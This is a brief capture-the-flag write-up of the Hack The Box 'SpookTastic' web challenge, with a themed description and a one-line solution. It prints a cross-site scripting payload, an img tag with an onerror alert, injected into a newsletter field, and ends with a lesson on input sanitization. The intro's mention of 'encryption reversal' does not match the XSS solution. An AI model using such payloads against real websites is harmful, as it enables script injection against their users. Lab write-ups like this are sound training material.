Explore the basics of cybersecurity in the SpookTastic Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/623

Description#

On a moonless night, you delve into the dark web to uncover the hacker group “The Cryptic Shadows.” You find an encrypted message guiding you to a web challenge. They claim a cursed amulet, the ‘Amulet of Samhain,’ can unveil their treasures location

Exploitation#

Just <img src="img.jpg" onerror=alert()> in Our Newsletter

Summary#

SpookTastic is a very-easy-level challenge on Hack The Box that exploits a Cross-Site Scripting (XSS) vulnerability. By injecting <img src="img.jpg" onerror=alert()> into the newsletter input, the challenge demonstrates the impact of unvalidated user input, highlighting the importance of proper input sanitization to prevent XSS attacks.